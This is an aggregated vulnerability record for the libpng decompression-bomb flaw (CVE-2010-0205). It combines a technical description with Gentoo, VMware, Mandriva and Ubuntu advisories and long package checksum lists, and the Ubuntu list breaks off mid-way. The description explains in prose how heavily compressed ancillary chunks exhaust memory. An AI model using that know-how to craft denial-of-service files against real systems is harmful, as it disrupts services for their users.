Vulnerability from variot - Updated: 2026-03-09 22:46The png_decompress_chunk function in pngrutil.c in libpng 1.0.x before 1.0.53, 1.2.x before 1.2.43, and 1.4.x before 1.4.1 does not properly handle compressed ancillary-chunk data that has a disproportionately large uncompressed representation, which allows remote attackers to cause a denial of service (memory and CPU consumption, and application hang) via a crafted PNG file, as demonstrated by use of the deflate compression method on data composed of many occurrences of the same character, related to a "decompression bomb" attack. libpng Has a specific PNG ( Portable Network Graphics ) There is a problem with the file processing. libpng Contains crafted auxiliary chunks PNG When processing files, a huge amount of memory CPU May use resources. For more information, PNG Development Group Security advisories and Defending Libpng Applications Against Decompression Bombs Please confirm.Disturbance of service operation by a remote third party (DoS) An attack may be carried out. The 'libpng' library is prone to a remote denial-of-service vulnerability. Successful exploits will allow an attacker to consume an excessive amount of CPU memory, denying service to legitimate users. Successful exploits will allow an attacker to obtain potentially sensitive information. Versions prior to libpng 1.4.1, 1.2.43, and 1.0.53 are vulnerable. This resource consumption may cause applications using the libpng library to hang. The PNG format uses efficient compression to store graphic data and some related data in an auxiliary database. The PNG specification does not limit the number of chunks, limiting their size to 2.147G (2,147,483,647 bytes). Similarly, the specification limits the width and height of graphics to 2.147 billion rows and 2.147 billion columns. Since the deflate compression method can very efficiently compress data streams consisting of repeated single bytes, small PNG files may occupy a large amount of memory when decompressed, forming a \"decompression bomb that exhausts all available memory. For example, for a zTXt block containing 50,000 lines each containing 100 letters Z, the compressed size is about 17k bytes, but the decompressed size is 5M, and the compression ratio is about 300:1. Libpng library uses inefficient memory acquisition method when expanding compressed zTXt, iTXt and iCCP auxiliary data blocks. About 50k malformed iCCP blocks contained in graphic files can be decompressed to 60M, which will hang the browser for about 20 Minutes, a well-crafted malicious block can also hang the browser for even longer, using up all available memory. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201010-01
http://security.gentoo.org/
Severity: Normal Title: Libpng: Multiple vulnerabilities Date: October 05, 2010 Bugs: #307637, #324153, #335887 ID: 201010-01
Synopsis
Multiple vulnerabilities in libpng might lead to privilege escalation or a Denial of Service. It is used by several programs, including web browsers and potentially server processes.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 media-libs/libpng < 1.4.3 >= 1.4.3
Description
Multiple vulnerabilities were found in libpng:
-
The png_decompress_chunk() function in pngrutil.c does not properly handle certain type of compressed data (CVE-2010-0205)
-
A buffer overflow in pngread.c when using progressive applications (CVE-2010-1205)
-
A memory leak in pngrutil.c when dealing with a certain type of chunks (CVE-2010-2249)
Impact
An attacker could exploit these vulnerabilities to cause programs linked against the library to crash or execute arbitrary code with the permissions of the user running the vulnerable program, which could be the root user.
Workaround
There is no known workaround at this time.
Resolution
All libpng users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/libpng-1.4.3"
References
[ 1 ] CVE-2010-0205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0205 [ 2 ] CVE-2010-1205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1205 [ 3 ] CVE-2010-2249 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2249
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201010-01.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2010 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
VMware Security Advisory
Advisory ID: VMSA-2010-0014 Synopsis: VMware Workstation, Player, and ACE address several security issues. Issue date: 2010-09-23 Updated on: 2010-09-23 (initial release of advisory) CVE numbers: CVE-2010-3277 CVE-2010-1205 CVE-2010-0205 CVE-2010-2249 CVE-2010-0434 CVE-2010-0425
- Summary
VMware Workstation and Player address a potential installer security issue and security issues in libpng. VMware ACE Management Server (AMS) for Windows updates Apache httpd.
- Relevant releases
VMware Workstation 7.1.1 and earlier, VMware Player 3.1.1 and earlier, VMware ACE Management Server 2.7.1 and earlier,
Note: VMware Server was declared End Of Availability on January 2010, support will be limited to Technical Guidance for the duration of the support term.
- Problem Description
a. VMware Workstation and Player installer security issue
The Workstation 7.x and Player 3.x installers will load an index.htm
file located in the current working directory on which Workstation
7.x or Player 3.x is being installed. This may allow an attacker to
display a malicious file if they manage to get their file onto the
system prior to installation.
The issue can only be exploited at the time that Workstation 7.x or
Player 3.x is being installed. Installed versions of Workstation and
Player are not affected. The security issue is no longer present in
the installer of the new versions of Workstation 7.x and Player 3.x
(see table below for the version numbers).
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2010-3277 to this issue.
VMware would like to thank Alexander Trofimov and Marc Esher for
independently reporting this issue to VMware.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
VirtualCenter any Windows not affected
Workstation 7.x any 7.1.2 build 301548 or later *
Workstation 6.5.x any not affected
Player 3.x any 3.1.2 build 301548 or later *
Player 2.5.x any not affected
AMS any any not affected
Server any any not affected
Fusion any Mac OS/X not affected
ESXi any ESXi not affected
ESX any ESX not affected
- Note: This only affects the installer, if you have a version of Workstation or Player installed you are not vulnerable.
b. Third party libpng updated to version 1.2.44
A buffer overflow condition in libpng is addressed that could
potentially lead to code execution with the privileges of the
application using libpng. Two potential denial of service issues
are also addressed in the update.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-1205, CVE-2010-0205, CVE-2010-2249
to these issues.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
VirtualCenter any Windows not affected
Workstation 7.1.x any 7.1.2 build 301548 or later
Workstation 6.5.x any affected, patch pending
Player 3.1.x any 3.1.2 build 301548 or later
Player 2.5.x any affected, patch pending
AMS any any not affected
Server any any affected, no patch planned
Fusion any Mac OS/X not affected
ESXi any ESXi not affected
ESX any ESX not affected
c. VMware ACE Management Server (AMS) for Windows updates Apache httpd version 2.2.15.
A function in Apache HTTP Server when multithreaded MPM is used
does not properly handle headers in subrequests in certain
circumstances which may allow remote attackers to obtain sensitive
information via a crafted request that triggers access to memory
locations associated with an earlier request.
The Apache mod_isapi module can be forced to unload a specific
library before the processing of a request is complete, resulting
in memory corruption. This vulnerability may allow a remote
attacker to execute arbitrary code.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-0434 and CVE-2010-0425 to the
issues addressed in this update.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
VirtualCenter any Windows not affected
Workstation any any not affected
Player any any not affected
AMS any Windows 2.7.2 build 301548 or later
AMS any Linux affected, patch pending *
Server any any not affected
Fusion any Mac OS/X not affected
ESXi any ESXi not affected
ESX any ESX not affected
-
Note CVE-2010-0425 is not applicable to AMS running on Linux
-
Solution Please review the patch/release notes for your product and version and verify the md5sum and/or the sha1sum of your downloaded file.
VMware Workstation 7.1.2
http://www.vmware.com/download/ws/ Release notes: http://downloads.vmware.com/support/ws71/doc/releasenotes_ws712.html
Workstation for Windows 32-bit and 64-bit with VMware Tools
md5sum: 2e9715ec297dc3ca904ad2707d3e2614
sha1sum: 55b2b99f67c3dacd402fb9880999086efd264e7a
Workstation for Windows 32-bit and 64-bit without VMware Tools
md5sum: 066929f59aef46f11f4d9fd6c6b36e4d
sha1sum: def776a28ee1a21b1ad26e836ae868551fff6fc3
VMware Player 3.1.2
http://www.vmware.com/download/player/ Release notes:
http://downloads.vmware.com/support/player31/doc/releasenotes_player312.html
VMware Player for Windows 32-bit and 64-bit
md5sum: 3f289cb33af5e425c92d8512fb22a7ba
sha1sum: bf67240c1f410ebeb8dcb4f6d7371334bf9a6b70
VMware Player for Linux 32-bit
md5sum: 11e3e3e8753e1d9abbbb92c4e3c1dfe8
sha1sum: dd1dbcdb1f4654eefc11472b68934dcb69842749
VMware Player for Linux 64-bit
md5sum: 2ab08e0d4050719845a64d334ca15bb1
sha1sum: f024ad84ec831fce8667dfa9601851da5d9fa59c
VMware ACE Management Server 2.7.2
http://downloads.vmware.com/d/info/desktop_downloads/vmware_ace/2_7 Release notes: http://downloads.vmware.com/support/ace27/doc/releasenotes_ace272.html
ACE Management Server for Windows
md5sum: 02f0072b8e48a98ed914b633f070d550
sha1sum: 94a68eac4a328d21a741879b9d063227c0dc1ce4
- References
CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3277 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2249 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0434 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0425
- Change log
2010-09-23 VMSA-2010-0014 Initial security advisory after release of Workstation 7.1.2, Player 3.1.2 and ACE Management Server 2.7.2 on 2010-09-23
- Contact
E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
- security-announce at lists.vmware.com
- bugtraq at securityfocus.com
- full-disclosure at lists.grok.org.uk
E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055
VMware Security Center http://www.vmware.com/security
VMware Security Advisories http://www.vmware.com/security/advisoiries
VMware security response policy http://www.vmware.com/support/policies/security_response.html
General support life cycle policy http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html
Copyright 2010 VMware Inc. All rights reserved.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (MingW32)
iEYEARECAAYFAkycSrQACgkQS2KysvBH1xmT9wCfbBUS4GYrJohz+QMLYcoiFmSh eTgAoIAmx+ilbe2myj02daLjFrVQfQII =5jlh -----END PGP SIGNATURE----- .
Packages for 2008.0 are provided for Corporate Desktop 2008.0 customers.
The updated packages have been patched to correct these issues.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2042 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0205
Updated Packages:
Mandriva Linux 2008.0: a490385a7af091254460923d5b370281 2008.0/i586/libpng3-1.2.22-0.4mdv2008.0.i586.rpm 0a24bbf70a2d0acfe67872e0c9d8f709 2008.0/i586/libpng-devel-1.2.22-0.4mdv2008.0.i586.rpm 4606a9e929c6051e122b70ebe2e7bad4 2008.0/i586/libpng-source-1.2.22-0.4mdv2008.0.i586.rpm 694d03d2e8d3bcd07fc0684fd8a6b0c9 2008.0/i586/libpng-static-devel-1.2.22-0.4mdv2008.0.i586.rpm da310f9645a322af4d2a97b9cf4592eb 2008.0/SRPMS/libpng-1.2.22-0.4mdv2008.0.src.rpm
Mandriva Linux 2008.0/X86_64: 4502fd5d882a47d409bfd0e0bc154c88 2008.0/x86_64/lib64png3-1.2.22-0.4mdv2008.0.x86_64.rpm 91b539a7a3a87d57c1ee1e33921aa787 2008.0/x86_64/lib64png-devel-1.2.22-0.4mdv2008.0.x86_64.rpm f0e202692b44e5ebd09168e307a1ad7b 2008.0/x86_64/lib64png-static-devel-1.2.22-0.4mdv2008.0.x86_64.rpm a5c685aa7aac15155af58211a576e08c 2008.0/x86_64/libpng-source-1.2.22-0.4mdv2008.0.x86_64.rpm da310f9645a322af4d2a97b9cf4592eb 2008.0/SRPMS/libpng-1.2.22-0.4mdv2008.0.src.rpm
Corporate 4.0: e224d113e77e285d85ff11c55dae9e50 corporate/4.0/i586/libpng3-1.2.8-1.7.20060mlcs4.i586.rpm c0d62f11277442b0d7a909d0c1c53249 corporate/4.0/i586/libpng3-devel-1.2.8-1.7.20060mlcs4.i586.rpm 8ea7ca8ab7bbed8f2683698a3f493d56 corporate/4.0/i586/libpng3-static-devel-1.2.8-1.7.20060mlcs4.i586.rpm 76f958bdba2876ea2a36f42407aaa9dc corporate/4.0/SRPMS/libpng-1.2.8-1.7.20060mlcs4.src.rpm
Corporate 4.0/X86_64: a19c0839e78e5d16cc159621ff8e3786 corporate/4.0/x86_64/lib64png3-1.2.8-1.7.20060mlcs4.x86_64.rpm 68d1b5c5174f6de15eb1d68735e45e0f corporate/4.0/x86_64/lib64png3-devel-1.2.8-1.7.20060mlcs4.x86_64.rpm d477b9271f6beba77435121f09dff09d corporate/4.0/x86_64/lib64png3-static-devel-1.2.8-1.7.20060mlcs4.x86_64.rpm 76f958bdba2876ea2a36f42407aaa9dc corporate/4.0/SRPMS/libpng-1.2.8-1.7.20060mlcs4.src.rpm
Multi Network Firewall 2.0: 5fe2f05d45ebaac79c58e47429dedceb mnf/2.0/i586/libpng3-1.2.5-10.12.M20mdk.i586.rpm 0ebace3f9758ea06e6471317f95b253f mnf/2.0/i586/libpng3-devel-1.2.5-10.12.M20mdk.i586.rpm 3aa8ba999455eb190979ec7f6f22421a mnf/2.0/i586/libpng3-static-devel-1.2.5-10.12.M20mdk.i586.rpm 1ceca3083b90247ac1d1b68b4bf08f33 mnf/2.0/SRPMS/libpng-1.2.5-10.12.M20mdk.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFLp88BmqjQ0CJFipgRAl2vAKCNCYs8gf3lw0tqgRMM6WC87P6roQCfZMU2 M2vZq2Q3ZYYDuZssm6LfxaI= =dFcH -----END PGP SIGNATURE----- . =========================================================== Ubuntu Security Notice USN-913-1 March 16, 2010 libpng vulnerabilities CVE-2009-2042, CVE-2010-0205 ===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 Ubuntu 9.10
This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the following package versions:
Ubuntu 6.06 LTS: libpng12-0 1.2.8rel-5ubuntu0.5
Ubuntu 8.04 LTS: libpng12-0 1.2.15~beta5-3ubuntu0.2
Ubuntu 8.10: libpng12-0 1.2.27-1ubuntu0.2
Ubuntu 9.04: libpng12-0 1.2.27-2ubuntu2.1
Ubuntu 9.10: libpng12-0 1.2.37-1ubuntu0.1
After a standard system upgrade you need to reboot your computer to effect the necessary changes.
Details follow:
It was discovered that libpng did not properly initialize memory when decoding certain 1-bit interlaced images. If a user or automated system were tricked into processing crafted PNG images, an attacker could possibly use this flaw to read sensitive information stored in memory. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 8.10 and 9.04. (CVE-2009-2042)
It was discovered that libpng did not properly handle certain excessively compressed PNG images. If a user or automated system were tricked into processing a crafted PNG image, an attacker could possibly use this flaw to consume all available resources, resulting in a denial of service. (CVE-2010-0205)
Updated packages for Ubuntu 6.06 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.5.diff.gz
Size/MD5: 22337 fa254fcc4cb513e59eb9467abad87cca
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.5.dsc
Size/MD5: 661 17f3956e31ccadfed0a3bfdc8f5f065a
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz
Size/MD5: 510681 cac1512878fb98f2456df6dc50bc9bc7
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.5_all.deb
Size/MD5: 842 a5ab55fb1b372c9ac93493fd699b276f
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.5_amd64.deb
Size/MD5: 114374 1315864425b2dfaea123fe05118de0b0
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.5_amd64.deb
Size/MD5: 247552 4acf10d5d173d06843cb1dc9b1b894fe
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.5_amd64.udeb
Size/MD5: 69464 1761fb1c524387b8aabd7bd3dccb2eda
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.5_i386.deb
Size/MD5: 111916 0043501424d2cee81d5f6229a2b3d166
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.5_i386.deb
Size/MD5: 239610 8422b7b137f09b49d27541a87251cce4
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.5_i386.udeb
Size/MD5: 66948 a8e6db358ed472eb9f18d3b51aed1347
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.5_powerpc.deb
Size/MD5: 111422 a0ea39141ce6319b057db22e9fcaf8d6
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.5_powerpc.deb
Size/MD5: 245142 d2d7ed0b8fa777fd58fe78345625a1e7
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.5_powerpc.udeb
Size/MD5: 66386 f65de398bac540da7a25370999eb9643
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.5_sparc.deb
Size/MD5: 108988 5bad496a668c87614866fe1f04c8c17e
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.5_sparc.deb
Size/MD5: 239972 b3cf4fc712ab063ababdefc5030ad07a
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.5_sparc.udeb
Size/MD5: 63832 148d28886ec7fdb3334196a762daad1c
Updated packages for Ubuntu 8.04 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-3ubuntu0.2.diff.gz
Size/MD5: 21048 9f9e2ce175afd0a41bfa613c8672a164
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-3ubuntu0.2.dsc
Size/MD5: 832 59b9f6994e1bef9b8f83561b70afda00
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz
Size/MD5: 829038 77ca14fcee1f1f4daaaa28123bd0b22d
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.15~beta5-3ubuntu0.2_all.deb
Size/MD5: 940 e6cfd9d151530dac9ef81148e1690e61
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.2_amd64.deb
Size/MD5: 190022 6a7c0dfd7c8501f8628178b5b0eee0cd
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.2_amd64.deb
Size/MD5: 179662 bc60e9256f650d385f0c1d175c14fe80
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.2_amd64.udeb
Size/MD5: 70430 a6782df5314e3c49137b1d3253c2c6b4
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.2_i386.deb
Size/MD5: 188650 0d4b87ea55d252a24bc74ebc4d748645
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.2_i386.deb
Size/MD5: 171178 9608ecb2bd7697bbf4510822a6c61e32
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.2_i386.udeb
Size/MD5: 69094 f39b5e822f4da67599876c68904ecad1
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.2_lpia.deb
Size/MD5: 189520 36f70d5b5d6cc10e89323efd72b3e061
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.2_lpia.deb
Size/MD5: 172882 1b5a5a4d6198c0eb6b14dc89c5a9da19
http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.2_lpia.udeb
Size/MD5: 69994 a3e824e57de27f7b7ed1b93ddd6f6917
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.2_powerpc.deb
Size/MD5: 190076 8ec2399126dc45cb9069588dec4f23ef
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.2_powerpc.deb
Size/MD5: 179070 3a16935d6ed3029b636f5a2277470659
http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.2_powerpc.udeb
Size/MD5: 70556 a2f68773735f91ca14c95fe374a56d7b
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.2_sparc.deb
Size/MD5: 185426 8755e9f8c1be78dbe2de213d9666fd7f
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.2_sparc.deb
Size/MD5: 173332 f94ff6354e27bda2f21a8a542e77f274
http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.2_sparc.udeb
Size/MD5: 65854 2631780a00ee2727264e6d0f477daa83
Updated packages for Ubuntu 8.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27-1ubuntu0.2.diff.gz
Size/MD5: 19116 22de419d4a9203e183ccc14813b0d5e2
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27-1ubuntu0.2.dsc
Size/MD5: 1293 bd0ff3a04141fae88c8136f6f9ee63d4
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27.orig.tar.gz
Size/MD5: 783204 13a0de401db1972a8e68f47d5bdadd13
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.27-1ubuntu0.2_all.deb
Size/MD5: 934 cdd02e7c09b4bb61bd14670f155f81f4
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.27-1ubuntu0.2_amd64.deb
Size/MD5: 168308 37a5c4970ffd3dc878026e66310bfecc
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.27-1ubuntu0.2_amd64.deb
Size/MD5: 255526 df3e911f99e2d64d3246710e0dea9d49
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.27-1ubuntu0.2_amd64.udeb
Size/MD5: 72758 6a64efb6a07e32ddfe80bed566e110c8
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.27-1ubuntu0.2_i386.deb
Size/MD5: 166630 08a7389cb42e41ebba773ecdb9e347fe
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.27-1ubuntu0.2_i386.deb
Size/MD5: 247664 e39fbb64952529e977b335e308662782
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.27-1ubuntu0.2_i386.udeb
Size/MD5: 71014 9e5c717ed5d4e17d86caabb80221030d
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-1ubuntu0.2_lpia.deb
Size/MD5: 167096 ed195852cc2b60cb0ddc9cccf87ed280
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-1ubuntu0.2_lpia.deb
Size/MD5: 248616 dc85b020b9a129916f24618d3e27e684
http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.27-1ubuntu0.2_lpia.udeb
Size/MD5: 71418 e60289ac791f78aae8eb5598a3eacb5a
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-1ubuntu0.2_powerpc.deb
Size/MD5: 167230 5f8b71b3a98b1645727f1f4ae534f960
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-1ubuntu0.2_powerpc.deb
Size/MD5: 254380 76ea57650fd01eb86a315ca0b73dcdca
http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.27-1ubuntu0.2_powerpc.udeb
Size/MD5: 71582 f9b8803343f2f61bf5f07b1fb4a25918
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-1ubuntu0.2_sparc.deb
Size/MD5: 162222 445a3d3abb843e73fbf89fe0520ab664
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-1ubuntu0.2_sparc.deb
Size/MD5: 248216 768f20b123d1b0c1c448b3b240245d5c
http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.27-1ubuntu0.2_sparc.udeb
Size/MD5: 66728 cf376eab6461fdee69f0bbde6d58dc53
Updated packages for Ubuntu 9.04:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27-2ubuntu2.1.diff.gz
Size/MD5: 174503 ffa63cd1b57dc442faff9a65d2f25ee7
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27-2ubuntu2.1.dsc
Size/MD5: 1296 890ff19ff7b12aa90d0d38c0b1550055
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27.orig.tar.gz
Size/MD5: 783204 13a0de401db1972a8e68f47d5bdadd13
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.27-2ubuntu2.1_all.deb
Size/MD5: 936 3dee09961304f1caf76db0995a027b95
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.1_amd64.udeb
Size/MD5: 72778 30622682dc700cba1101384ab84fe7ca
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.1_amd64.deb
Size/MD5: 168382 4be6ce864bf04169baf7d4b656ea8e02
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.1_amd64.deb
Size/MD5: 255620 730ed6a69006fa14753ef99f89664d31
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.1_i386.udeb
Size/MD5: 71084 5a3cc8f7589fae49e91689d85476b193
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.1_i386.deb
Size/MD5: 166732 d674a5262197c091d9ca5b2370cff187
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.1_i386.deb
Size/MD5: 247744 644a3757529a46d3389e2db18a566f3d
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.1_lpia.udeb
Size/MD5: 71472 662aba7284b732240c2d7bff864eed12
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.1_lpia.deb
Size/MD5: 167200 47dc03f91b37b73626e026cb7da28b15
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.1_lpia.deb
Size/MD5: 248706 a01e8fe54d38f4101c6ad0f78eec4a7e
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.1_powerpc.udeb
Size/MD5: 71564 96e3fb7342ab462db7a27fbd39a46649
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.1_powerpc.deb
Size/MD5: 167254 90e1cb3da8cc85953442611cf0faaed8
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.1_powerpc.deb
